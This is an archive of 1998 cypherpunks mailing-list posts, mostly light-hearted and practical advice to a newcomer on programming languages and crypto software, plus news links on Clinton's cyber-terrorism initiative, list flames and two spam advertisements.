Everyday, a new free pic will be posted to six different categories.
All six pics are updated daily. Your surfers will come back everyday
to see the new "of the day" pics.  Best of all, it's TOTALLY FREE TO YOU.
It is not often that you will receive an offer that is truly a win/win
proposition.  Most free content providers have a hidden agenda.
Either they want to keep all of the money generated by the banners,
or make you post something about them in a prime location on your site.
That is not what I am offering.  You get to keep all of the banner money,
and I don't require a reciprocal link of any kind.  Check it out.

http://www.pleasureclub.com/sextracash/sexpack.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@pathfinder.com>
Date: Thu, 21 May 1998 11:29:36 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: Re: programing
In-Reply-To: <19980522.120339.3414.0.josh434@juno.com>
Message-ID: <Pine.GSO.3.95.980521142640.8724G-100000@cp.pathfinder.com>
MIME-Version: 1.0
Content-Type: text/plain


My favorites are Applesoft BASIC and 6502 assembly. I suggest you go out
an buy an Apple IIe. Just think -- no need to deal with any messy
compiler, and you've got BASIC in ROM! A win-win situation, I say! 

Good luck!

-Declan


On Fri, 22 May 1998, josh d smith wrote:

> hello i am new to this list
> i would like to know what programing language everyone prefers
> and any books they recommend on that subject





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Thu, 21 May 1998 12:08:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: programing
Message-ID: <b2ab1821.35647b80@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/21/98 1:47:56 PM Central Daylight Time,
declan@pathfinder.com writes:

<< My favorites are Applesoft BASIC and 6502 assembly. I suggest you go out
 an buy an Apple IIe. Just think -- no need to deal with any messy
 compiler, and you've got BASIC in ROM! A win-win situation, I say!  >>

Oh Man!  If you're gonna suggest 6502, go out and get a Cad... - a C-64 with a
6510!

Seriously.  ;-)

Stan Rosenthal 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Thu, 21 May 1998 15:20:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: programing
In-Reply-To: <19980522.120339.3414.0.josh434@juno.com>
Message-ID: <v03130306b18a556b419e@[209.75.197.30]>
MIME-Version: 1.0
Content-Type: text/plain


PERL is horrendously less efficient, but easy to code for grunt work like
data processing and administrative scripts. PERL is THE BOMB for CGI web
programming, and combined with a nice free database with like mySQL, you
can produce some really amazing applications. I'd guess quite a few on the
list use PERL... I do, almost exclusively, but I'm making services and
doing sysadmin and not producing platform-specific applications. Then, C is
the most likely language used. Probably lots of people have their own
favorite languages. The O'Reilly and Associates 'Nutshell' books are widely
accepted as good reference manuals and tutorials in many lanugages. Certain
languages work better for certain applications. Check a technical bookstore.

Mark Hedges
Infonex/Anonymizer


>At 12:03 PM 5/22/98 -0600, you wrote:
>>
>>hello i am new to this list
>>i would like to know what programing language everyone prefers
>>and any books they recommend on that subject
>
>Josh, my guess is that about 99% of programmers on this list use C
>whether they like it or not. What they prefer might be quite
>different. ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 May 1998 12:34:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Archives: Blast from the past on GSM...
In-Reply-To: <199805211325.GAA04504@joseph.cs.berkeley.edu>
Message-ID: <199805211934.PAA12995@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:

>Anyway, much more than Y2K, I can imagine some poor old fart sweating away
>right now, waiting for some intellegent young hacker to come along and
>evicerate his whole installed code base, just because he decided the "rest
>of us" were too stupid to figure out how smart he was.

Are you imagining "limited traceability" being discovered to be not what
it claims to be?

It was humorous that several of Chaum's equations were printed upside 
down and/or mirror-imaged, yet got through the 4-year review process 
just fine. He must have chuckled at that.

And that several "embodiments of the present invention" just flat out
said "if you trust this digital transaction you are one dumb MF who 
deserves to be monitored,"  thereby assuring the user of his invention
that a target is just as dumb.

It's impressive that Chaum intends to fleece the law-abiding and the 
outlaws by getting them chasing their tails thinking they're secretly 
tracing/escaping the opposition while he laughs all the way to the . . .

Y2K is the tip of this techno-shamanry-duplicity, wild humor with a
straight-bankers-face, umm, like guess who -- our best Chaumian style
comedian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Thu, 21 May 1998 16:01:13 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: re:programming
In-Reply-To: <19980522.152606.3382.5.josh434@juno.com>
Message-ID: <Pine.SUN.3.91.980521175316.3331A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 May 1998, josh d smith wrote:

> i was thinking along the lines of pascal or c

> what is wrong with pascal or c please enclose all things that i should
> take in to consideration

	Neither has an ON GOTO command.

	I mean, this feature is decades old!  Jeez, you'd think they'd
	have one by now.  At least, we have FORTRAN's arithmetic IF.
	How can you write a good text adventure game without an ON GOTO?

	Seriously, I think ANSI C would be more universal, and less
	anal-retentive than Pascal.  Pascal was designed by a Nazi
	Fascist who wanted all programmers to sit up straight in
	their chairs and keep their office supplies carefully 
	arranged.  Real computer programming isn't office supplies
	and sitting up straight.  It's slouching, poorly-ventilated
	basements, and 20 half-empty cans of Barq's root beer.
	So program in C.

	Although the examples in Wayner's _Disappearing Cryptography_
	are written in pascal and lisp.  I guess I recommend learning
	as many languages as possible, but prepare to use C more than
	any other.

> much appreciative
>          josh

--                         __ +---------------------------------------------+
  ,ad8888ba,              (88)| Scott Adams, WHERE ARE YOU????????????????? |
 d8"' -- `"8b             `""'+--------------+--------------+---------------+
d8' "A Neo-                   | SpidermanTM  | SpidermanTM  | SpidermanTM,  |
88 NEO-Retro-  ,adPPYYba, :88 |    is no     |    is no     |  I want you   |
88  Techno-    ""     `Y8 :88 |   Vandal!!!  |   Killer!!!  | to:  BLOW ME  |
Y8,  Fest!"    ,adPPPPP88 :88 +--------------+--------------+---------------+
 Y8a. -- .a8P  88,    ,88 :88 |          Nothing special happens.           |
  `"Y8888Y"'   `"8bbdP"Y8 :88 +---------------------------------------------+
                          ;88 |  Draw a straight line that passes through   |
o=|caj@math.niu.edu|=888888P; |  every box in this .sig, and win $100.00!   |
http://www.math.niu.edu/~caj/ +---------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vcarlos35@juno.com (Karl Rierson)
Date: Thu, 21 May 1998 15:59:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: programming
In-Reply-To: <19980522.152606.3382.5.josh434@juno.com>
Message-ID: <19980521.185808.5791.0.vcarlos35@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


The problem with C or pascal is that it requires 
quite a bit of punctuation such as:
braces {}
parentheses ()
and semicolons ;
Since your keyboard seems to be missing even a
period, programming in C may be a bit difficult...

Sorry. Couldn't resist.

On Fri, 22 May 1998 15:25:42 -0600 josh434@juno.com (josh d smith)
writes:
>i was thinking along the lines of pascal or c
>i don't want to use apple or any form of it and besides i have a ibm 
>compatible
>which do you think is better
>thanx for all your responses
>they've helped somewhat 
>what is wrong with pascal or c please enclose all things that i should 
>take in to consideration
>much appreciative
>         josh

----
Karl Rierson, <vcarlos35@juno.com>
PGP: 0x72136D5B/2048-bit RSA/ EBDD 6E87 4C85 6F7F  65EA B30C 00FF 0229
F**cking Juno hasn't heard of decent sized line wraps

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Assass1n <assass1n@division-x.org>
Date: Fri, 22 May 1998 18:25:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Need a Decent nntp server
Message-ID: <3.0.5.32.19980521234128.007a9250@mail.division-x.org>
MIME-Version: 1.0
Content-Type: text/plain


This might be a little off subject since I am new to this mailing list but
I am in need of a good nntp server because the one my ISP runs is always
down if anyone has a list or just one or two good servers that alow sending
and receving please let me know

Assass1n
assass1n@division-x.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 21 May 1998 17:37:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Off topic.
Message-ID: <199805220037.CAA26634@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Call 1-800-343-3222 to stop the U. S. government from leeching off of the tobacco companies. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gypsy Wanderer" <gypsywanderer@hotmail.com>
Date: Fri, 22 May 1998 06:13:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Unix O/S
Message-ID: <19980522131258.29926.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi 
I'm new to posting on this list (I've been checking it out for a while, 
really interesting stuff).

I'm a computer science student and therefore a newbie, but am interested 
in cryptography. 

I will be taking a UNIX course next year and plan to set up a UNIX drive 
on my PC.

I'm interested in getting some advice on which UNIX O/S would be good to 
set up. I'm currently aware of FreeBSD, OpenBSD, SCO UNIX, and LINUX. 
Suggestions and the reasons why would be greatly appreciated.

Thanks, Gypsy


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 22 May 1998 05:04:13 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: vznuri is Vulis
In-Reply-To: <199805220508.BAA09714@panix2.panix.com>
Message-ID: <199805221202.HAA13035@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Information Security wrote:
>    >   From ichudov@Algebra.Com Thu May 21 23:09:59 1998
>    >   Information Security wrote:
>    >   >    >   From: "Vladimir Z. Nuri" <vznuri@netcom.com>
>    >   >    >   as for Timmy, you're better off ignoring him. he doesn't realize that
>    >   >    >   people take him far less seriously than he would hope.
>    >   > 
>    >   > Heh-heh-heh.
>    >   > Vulis's alternate personality is pathetic at flaming.
>    >   
>    >   1) He is not Vulis's alternate personality
> 
> He says in email he wants to convince me otherwise,
> but then failed to follow through with anything
> to document a real "Vladimir Z. Nuri".

Look, why don't you read two year old archives to figure things out.

>    >   2) You are also pathetic
> And you are Igor.
> ---guy, Vulis Terminator
>    KABLAMMO! dm.com was gone...Vulis never to post in his own name again

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan S. Camper" <lordgrey@borrowedtime.com>
Date: Fri, 22 May 1998 05:10:16 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: re:programing
Message-ID: <199805221209.HAA22593@goanna.outer.net>
MIME-Version: 1.0
Content-Type: text/plain


>sorry if i offended you x1 but everyone else seemed like they were
>willing to talk on the subject and nothing else was being said and i
>needed some advise and you all are suposed to be inteligent which some of
>you have proved thanx everyone for your input so on the subject of
>cyptogrify (sorry about the spelling) what program do you request using?
>and where can i get it

COBOL would let you practice putting periods at the end of statements.  
Learn two things at once!

More seriously, code written in C, C++ and Perl is in demand.  There's a 
better chance that more people can maintain or update your code than if 
it was written in a less mainstream language, and customers tend to 
appreciate that.  Out of those three, Perl is probably the best 
introductory language.

DSC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Fri, 22 May 1998 03:33:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: programing (Ada95)
In-Reply-To: <19980522.120339.3414.0.josh434@juno.com>
Message-ID: <E0ycp8O-0008Ra-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


josh d smith wrote on 1998-05-22 18:03 UTC:
> i would like to know what programing language everyone prefers
> and any books they recommend on that subject

Depends on what I write:

  C     for efficient quickly developed unsecure hacks

  Perl  for less efficient more quickly developed hacks

  Ada95 for efficient large scale security critical applications,
        especially anything where multi-threading is a big issue

C and Perl are widely known, so I'll only speak about the third one:

Ada95 is actually a very nice language, and I wonder why it is still mostly
used by avionics engineers and the NSA and not so much in the commercial
world. Ada95 is object oriented, has exceptions, multithreading, object
synchronization, generics, decent type concepts, safe arrays and pointers,
etc. There is now a high-quality GNU Ada95 compiler available (GNAT, uses
the same backend and optimizer as gcc). I've put together some beginner's
information about Ada95 on

  http://www.cl.cam.ac.uk/~mgk25/ada.html

where you find information about books, free compilers and online tutorials.

Java is also a quite nice language. Essentially rather close in functionality
to Ada95, but more targeted towards mobile code applications, while Ada95
is more targeted towards high-performance and embedded security applications
(has better support for low-level programming than Java). Pascal and
Basic are mostly obsolete today (no classes, exceptions, tasks, etc.).

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: R Sriram <rsriram@krdl.org.sg>
Date: Thu, 21 May 1998 19:46:37 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: Re: programing
In-Reply-To: <19980522.120339.3414.0.josh434@juno.com>
Message-ID: <19980522104014.12855@krdl.org.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, May 22, 1998 at 12:03:37PM -0600, josh d smith wrote:
| hello i am new to this list
| i would like to know what programing language everyone prefers
| and any books they recommend on that subject
| thanx
| josh

My favourites are 6510 assembly (C=64), 6502 assembly (BBC Micro), Z80 
assembly (Speccy - you need assembler software), and 8086 assembly.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Iain Collins <icollins@scotland.net>
Date: Fri, 22 May 1998 02:49:28 -0700 (PDT)
To: "cypherpunks@toad.com>
Subject: RE: programing
Message-ID: <01BD856F.1E4A6CE0.icollins@scotland.net>
MIME-Version: 1.0
Content-Type: text/plain


On Saturday, May 23, 1998 3:33 AM, josh d smith [SMTP:josh434@juno.com] wrote:
> hello it is i josh once again
> i finally bought a book for visual basic
> does anyone know where i can get a complier for version 5
> the book is by waite group press
> by e zone it's web based though and i don't have the internet but i think
> it will be fine reading it out of the book what do you think
> thanx josh

You don't have the internet? You didn't get it with your CD? - I heard you can get it
on 3 x 1.44 MB disks from KwikMart (only $1.99).

Now, I'm not too sure how all this 'internet' stuff works (all rather complicated), but
don't you need one to send an e-mail? Boy have I been burned... ;)

Iain, icollins@sol.co.uk

PS: If you would like serious answer then feel free to send me a serious question
and I'd be happy to help you out (I'd say the questions are off topic from this list :).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Fri, 22 May 1998 08:29:37 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: Re: .
In-Reply-To: <199805221429.QAA08672@basement.replay.com>
Message-ID: <3565C458.CB00696D@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


VB isn't really all that bad, and it is a useful skill while Smalltalk is of
limited value.  As far as the version goes, VB5 is currently available and its
product will work directly with WIN32.  A more advisable phasing methodology
would be to only USE a small subset at first, adding other functionality to the
pot in use as time (and familiarity,  and experience, etc.) progress.

PHM

Anonymous wrote:

> josh d smith wrote:
> >
> > hello it is i josh once again
> > i finally bought a book for visual basic
> > does anyone know where i can get a complier for version 5
> > the book is by waite group press
> > by e zone it's web based though and i don't have the internet but i think
> > it will be fine reading it out of the book what do you think
> > thanx josh
> >
>
> Josh,
> Visual Basic is object oriented and uses late binding, like Smalltalk.
> I advise you learn Smalltalk before trying to understand Visual Basic.
>
> Also, version 5 is too advanced for a beginner. Start at version one and
> only upgrade for new features as you need them.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Fri, 22 May 1998 03:38:48 -0700 (PDT)
To: josh d smith <cypherpunks@toad.com
Subject: Re: programing
In-Reply-To: <19980523.001120.9374.0.josh434@juno.com>
Message-ID: <19980522113435.55078@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I would recommend PERL as a powerful, compact language, which has many
crypto modules available.

-- 
pub  1024/D9C69DF9 1997/10/14 Steve Mynott <steve@tightrope.demon.co.uk>
            "Documentation? The code is the documentation!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: josh434@juno.com (josh d smith)
Date: Thu, 21 May 1998 11:01:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: programing
Message-ID: <19980522.120339.3414.0.josh434@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


hello i am new to this list
i would like to know what programing language everyone prefers
and any books they recommend on that subject
thanx
josh

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: X1 <x1@acwref.org.sg>
Date: Thu, 21 May 1998 22:17:01 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: Re: programing
Message-ID: <19980522125520.26251@krdl.org.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, May 22, 1998 at 08:33:11PM -0600, josh d smith wrote:
| hello it is i josh once again
| i finally bought a book for visual basic
| does anyone know where i can get a complier for version 5
| the book is by waite group press
| by e zone it's web based though and i don't have the internet but i think
| it will be fine reading it out of the book what do you think
| thanx josh

This doesn't appear to have anything even closely related to the
purpose of the cypherpunks list. You should look at newsgroups like
comp.lang.basic.visual and look at other mailing lists.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Fri, 22 May 1998 11:24:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Unix O/S
Message-ID: <684212d9.3565c2af@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/22/98 10:29:27 AM Central Daylight Time,
nobody@REPLAY.COM writes:

<< I'm starting a petition for less wasted bandwidth in cypherpunks. >>

You would.

<< To show your support, just respond to this thread. >>

Oh, so there's no way we can show if we don't support your idea.  You create
what we call an un-level playing field.

BUT, in this case, I think there's a simple way that you can have it so
there's less wasted bandwidth here.  Ban anonomous posting.  ;-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: josh434@juno.com (josh d smith)
Date: Thu, 21 May 1998 14:23:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: re:programming
Message-ID: <19980522.152606.3382.5.josh434@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


i was thinking along the lines of pascal or c
i don't want to use apple or any form of it and besides i have a ibm
compatible
which do you think is better
thanx for all your responses
they've helped somewhat 
what is wrong with pascal or c please enclose all things that i should
take in to consideration
much appreciative
         josh

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 22 May 1998 06:55:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Off topic.
Message-ID: <199805221355.PAA03760@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 May 1998, Reeza! wrote:

> At 02:37 AM 22 05 98 +0200, Anonymous wrote:
> >Call 1-800-343-3222 to stop the U. S. government from leeching off of the
> tobacco companies.
> >
> >
>
> Is there a 1-800 number to stop both the government and the tobacco
> companies from leeching off of the general populace?
>


How do the tobacco companies leech off of the general populace? By selling
them something they want? I just don't want to pay five dollars for a pack
of cigarettes which is why I'm spamming this number.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 22 May 1998 07:29:10 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: .Re: programing
Message-ID: <199805221429.QAA08672@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



josh d smith wrote:
> 
> hello it is i josh once again
> i finally bought a book for visual basic
> does anyone know where i can get a complier for version 5
> the book is by waite group press
> by e zone it's web based though and i don't have the internet but i think
> it will be fine reading it out of the book what do you think
> thanx josh
> 

Josh,
Visual Basic is object oriented and uses late binding, like Smalltalk.
I advise you learn Smalltalk before trying to understand Visual Basic.

Also, version 5 is too advanced for a beginner. Start at version one and
only upgrade for new features as you need them.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 22 May 1998 08:07:11 -0700 (PDT)
To: Gypsy Wanderer <gypsywanderer@hotmail.com>
Subject: .Re: Unix O/S
Message-ID: <199805221507.RAA14858@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Gypsy Wanderer wrote:
> 
> Hi
> I'm new to posting on this list (I've been checking it out for a while,
> really interesting stuff).
> 
> I'm a computer science student and therefore a newbie, but am interested
> in cryptography.
> 
> I will be taking a UNIX course next year and plan to set up a UNIX drive
> on my PC.
> 
> I'm interested in getting some advice on which UNIX O/S would be good to
> set up. I'm currently aware of FreeBSD, OpenBSD, SCO UNIX, and LINUX.
> Suggestions and the reasons why would be greatly appreciated.
> 
> Thanks, Gypsy
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com


I'm starting a petition for less wasted bandwidth in cypherpunks.
To show your support, just respond to this thread.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: X1 <x1@aardvark.org.sg>
Date: Fri, 22 May 1998 04:08:31 -0700 (PDT)
To: josh d smith <josh434@juno.com>
Subject: Crypto programs.
Message-ID: <19980522190349.54147@krdl.org.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, May 23, 1998 at 12:11:17AM -0600, josh d smith wrote:
| sorry if i offended you x1 but everyone else seemed like they were
| willing to talk on the subject and nothing else was being said and i
| needed some advise and you all are suposed to be inteligent which some of
| you have proved thanx everyone for your input so on the subject of
| cyptogrify (sorry about the spelling) what program do you request using?
| and where can i get it

Some of the best crypto programs:
PGP available at http://www.pgpi.com/
If you're in the US, look at http://www.pgp.com/

If you run Linux, you could look at CFS (Cryptographic File System)

Look at http://www.cs.hut.fi/crypto for lots of info about crypto,
links, algorithms, software, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 22 May 1998 16:24:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Clinton Backs Cyber-Terror Warnings
Message-ID: <199805222324.TAA01375@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


May 22, 1998
Clinton Backs Cyber-Terror Warnings
Filed at 1:31 p.m. EDT
By The Associated Press

ANNAPOLIS, Md. (AP) -- Nuclear warheads were the stuff of Cold War
stockpiles and beachheads the battlefields of times gone by. To counter
today's threats, President Clinton told a new class of Naval officers, the
United States must amass germ-warfare vaccines and battle terrorists in
cyberspace. 

``If our children are to grow up safe and free, we must approach these new
21st century threats with the same rigor and determination we applied to the
toughest security challenges of this century,'' the president said today in
a commencement speech at the U.S. Naval Academy. 

For the 769 graduating midshipmen and 139 midshipwomen whose dress uniforms
shone blindingly white in the sun, Clinton painted a near-apocalyptic
picture of the enemies who threatened their mission beyond the academy. 

``As we approach the 21st century, our foes have extended the fields of
battle from physical space to cyberspace, from the world's vast bodies of
water to the complex workings of our own human body. Rather than invading
our beaches or launching bombers, these adversaries may attempt cyber
attacks against our critical military systems and our economic base,''
Clinton said. 

Clinton also called for an interconnected ``cyber-system'' that would warn
and minimize damage of attacks on computers that control the stock market,
banking, utilities, air traffic and other so-called ``critical
infrastructure.'' 

Private companies including IBM, Dell Computers, Bell South and GTE have
already agreed to participate in the ``cyber-system,'' which Clinton wants
to be fully operational by 2003, administration officials said. 

``If we fail to take strong action, then terrorists, criminals and hostile
regimes could invade and paralyze these vital systems, disrupting commerce,
threatening health, weakening our capacity to function in a crisis,''
Clinton said. 

He appointed National Security Council adviser Richard Clarke, who
specializes in such issues as drug trafficking and terrorism, to head a new
office on infrastructure protection and counter-terrorism. Former Sen. Sam
Nunn and Jamie Gorelick, formerly the Justice Department's No. 2 official
and now Fannie Mae's vice chairwoman, will lead a private industry advisory

group. 

[Warnings of bio-terrorism snipped]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 22 May 1998 17:28:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Clinton's Anti-Terrorism Initiative
Message-ID: <199805230028.UAA03044@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We've collected news and White House reports on 
Clinton's broad anti-terrorism initiative announced today,
including description of two related Presidential Directives:

   http://jya.com/prez-init.htm  (50K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: josh434@juno.com (josh d smith)
Date: Thu, 21 May 1998 19:31:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: re:programing
Message-ID: <19980522.203316.3382.0.josh434@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


hello it is i josh once again
i finally bought a book for visual basic
does anyone know where i can get a complier for version 5
the book is by waite group press
by e zone it's web based though and i don't have the internet but i think
it will be fine reading it out of the book what do you think
thanx josh

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 22 May 1998 17:44:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Sets Terms for Secret Court Review
Message-ID: <199805230044.UAA16392@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The US Attorney in the Payne v. NSA lawsuit has described
the procedure NSA requires for the case judge to assess NSA's 
"Glomar response" with a Top Secret-SCI-CODEWORD declaration 
concerning Crypto AG, NSA backdoor spying on cryptosystems, 
and other underhanded interceptions:

   http://jya.com/usa052098.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 22 May 1998 19:14:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PDD 63
Message-ID: <199805230204.WAA06865@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We've made an HTML version of Presidential Decision
Directive 63 which details Clinton's anti-terrorism orders
to federal agencies today:

   http://jya.com/pdd63.htm  (39K)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Fri, 22 May 1998 05:27:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Off topic.
In-Reply-To: <199805220037.CAA26634@basement.replay.com>
Message-ID: <3.0.5.32.19980522222705.008005d0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 02:37 AM 22 05 98 +0200, Anonymous wrote:
>Call 1-800-343-3222 to stop the U. S. government from leeching off of the
tobacco companies. 
>
>

Is there a 1-800 number to stop both the government and the tobacco
companies from leeching off of the general populace?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: josh434@juno.com (josh d smith)
Date: Thu, 21 May 1998 23:09:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: re:programing
Message-ID: <19980523.001120.9374.0.josh434@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


sorry if i offended you x1 but everyone else seemed like they were
willing to talk on the subject and nothing else was being said and i
needed some advise and you all are suposed to be inteligent which some of
you have proved thanx everyone for your input so on the subject of
cyptogrify (sorry about the spelling) what program do you request using?
and where can i get it
       thanx 
           josh

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 23 May 1998 06:31:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: E-Commerce Enhancement Act
Message-ID: <199805231331.JAA03260@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpt from statement on introduction of S.2107, "Electronic
Commerce Enhancement Act," May 21, 1998 :

 The most important benefit of this legislation, however, lies in the
area of electronic innovation. Currently, digital encryption is in a
relatively undeveloped state. One reason for that is the lack of
opportunity for many individuals and companies to make use of the
technology. Another is the lack of a set industry standard. By allowing
use of this technology in the filling out of government paperwork, and
by establishing a standard for digital encryption, the federal
government can open the gates to quick, efficient development of this
technology, as well as its more application throughout the economy. The
benefits to American businesses as they struggle to establish paper-
free workplaces that will lower administrative costs, will be
significant, and will further spur our national economy.

-----

Full statement: http://jya.com/s2107-intro.txt








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: arpe@worldregister.com (WorldRegister)
Date: Sat, 23 May 1998 05:24:52 -0700 (PDT)
To: arpe@worldregister.com
Subject: World-wide security network for vehicles / objects
Message-ID: <NetContact.23.05.98.36030,41.arpe@worldregister.com>
MIME-Version: 1.0
Content-Type: text/plain



Important e-mail for your company, all of your employees, and customers

Dear Sir/Madam

Please, also click on http://www.worldregister.com

You will see how easily, cost-efficiently, and effectively you can
protect your valuable property  (vehicles and objects) better against theft
and misappropriation. You will also see how you can reduce your risk of unintentionally purchasing stolen goods  and with that prevent from slipping under the "wheels of justice." Immediate success is guaranteed.

We notify all press organs, insurance companies, leasing banks, and
merchants who are accessible worldwide via the Internet and by e-mail about
our new vigilance medium.  You can start profiting today!

Short documentation
http://www.worldregister.com/english/kurzprospekt.htm

Good reasons for joining
